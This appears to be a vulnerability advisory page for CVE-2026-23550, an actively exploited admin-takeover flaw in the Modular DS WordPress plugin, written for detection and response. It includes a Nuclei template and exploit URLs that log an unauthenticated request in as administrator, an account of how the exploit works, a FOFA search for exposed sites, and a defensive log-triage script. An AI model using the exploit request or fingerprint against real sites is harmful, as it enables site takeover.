CVE-2026-23550
published 2026-01-14


Priority: P1 · 90
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 20.63% (97.2 percentile)
Incorrect Privilege Assignment vulnerability in Modular DS Modular DS modular-connector allows Privilege Escalation. This issue affects Modular DS: from n/a through <= 2.5.1.

Affected (1 range)

Vendor       Product      Version range   Fixed in
modular_ds   modular_ds   <= 2.5.1

Detection & IOCs (extracted from sources)

url: {{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo
url: {{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo
path: /plugins/modular-connector/
cookie: wordpress_logged_in

Nuclei template:
id: CVE-2026-23550
info:
  name: Modular DS - Broken Access Control
  author: DhiyaneshDk
  severity: high
http:
- method: GET
  path:
  - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
  - "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"
  matchers:
  - type: dsl
    dsl:
    - status_code == 302
    - contains(header, "wordpress_logged_in")
    condition: and

• Exploitation traffic targets the /api/modular-connector/login/ endpoint with query parameters origin=mo and type=foo; a successful exploit returns HTTP 302 with a Set-Cookie header containing 'wordpress_logged_in'.
• First active exploitation was detected on January 13 around 02:00 UTC; monitor server access logs for requests to the /api/modular-connector/login/ route from that date onward.
• After exploitation, check the WordPress admin user list for rogue admin accounts added by unauthenticated attackers leveraging the automatic admin login fallback mechanism.
• The exploit works by sending a request with 'direct request' mode activated and no user ID in the request body, causing the plugin to automatically fetch and log in as an existing admin or super admin user.
• FOFA fingerprint for identifying exposed Modular DS instances: search for body containing '/plugins/modular-connector/'.
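The two hunting steps above (scan access logs for the login route, then review the admin user list) can be turned into a small triage script. The following is an added example written for this page, not code from the vulnerability database, from Modular DS or from the Nuclei template author. It assumes Apache/nginx combined log format; the log lines, IP addresses, user names and registration dates are constructed sample data. Note that the `wordpress_logged_in` Set-Cookie is a response header and does not appear in a standard access log, so the script uses the path, the `origin=mo&type=foo` query pair and the 302 status as its signal.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (combined log format). Not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2026:02:14:05 +0000] "GET /index.php/api/modular-connector/login/abc123?origin=mo&type=foo HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.9 - - [13/Jan/2026:02:14:06 +0000] "GET /api/modular-connector/login/zzz?origin=mo&type=foo HTTP/1.1" 302 0 "-" "curl/8.4.0"
192.0.2.5 - - [12/Jan/2026:23:59:59 +0000] "GET /api/modular-connector/login/old?origin=mo&type=foo HTTP/1.1" 302 0 "-" "curl/8.4.0"
192.0.2.44 - - [14/Jan/2026:09:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.45 - - [14/Jan/2026:09:01:00 +0000] "GET /api/modular-connector/login/x?origin=mo&type=foo HTTP/1.1" 403 0 "-" "curl/8.4.0"
"""

# Constructed sample of a WordPress user export: (login, role, registered UTC). Not real data.
SAMPLE_USERS = [
    ("site_owner", "administrator", datetime(2024, 5, 2, tzinfo=timezone.utc)),
    ("editor_jane", "editor", datetime(2025, 11, 20, tzinfo=timezone.utc)),
    ("backup_svc", "administrator", datetime(2026, 1, 13, 2, 15, tzinfo=timezone.utc)),
]

# Date the page gives for the first observed exploitation (13 January 2026, UTC).
FIRST_SEEN = datetime(2026, 1, 13, 0, 0, tzinfo=timezone.utc)

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The vulnerable route, with or without the /index.php prefix, followed by one path segment.
LOGIN_PATH_RE = re.compile(r'^(?:/index\.php)?/api/modular-connector/login/[^/?]+/?$')


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return {'ip': m['ip'], 'ts': ts, 'method': m['method'],
            'target': m['target'], 'status': int(m['status'])}


def classify(entry):
    """Return a verdict string for a request hitting the login route, else None."""
    parts = urlsplit(entry['target'])
    if not LOGIN_PATH_RE.match(parts.path):
        return None
    qs = parse_qs(parts.query)
    if qs.get('origin') != ['mo'] or qs.get('type') != ['foo']:
        return 'login-route'            # route hit, but not the documented query pattern
    if entry['status'] == 302:
        return 'likely-exploit-success'  # redirect is the success indicator from the template
    return 'attempt'                     # same request shape, but the server did not redirect


def scan(log_text, since=FIRST_SEEN):
    """Scan log text and return (ip, iso timestamp, status, verdict) for each suspicious request.

    Pass since=None to include requests before the first-seen date as well.
    """
    hits = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None or (since is not None and e['ts'] < since):
            continue
        verdict = classify(e)
        if verdict:
            hits.append((e['ip'], e['ts'].isoformat(), e['status'], verdict))
    return hits


def new_admins(users, since=FIRST_SEEN):
    """Return logins of administrator / super admin accounts registered on or after `since`."""
    return [login for login, role, registered in users
            if role in ('administrator', 'super admin') and registered >= since]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print('admin accounts created since first exploitation:', new_admins(SAMPLE_USERS))
```

`scan()` reports two likely successful requests and one blocked attempt from the sample; the request dated 12 January is skipped by the default date filter and shows up only with `since=None`. A 403 or 404 on the same route still deserves a look, since it shows the endpoint was being probed. The `new_admins()` check is the second step from the notes above: any administrator account whose registration date falls after the first-seen date and that nobody on the team recognises should be treated as attacker-created until proven otherwise.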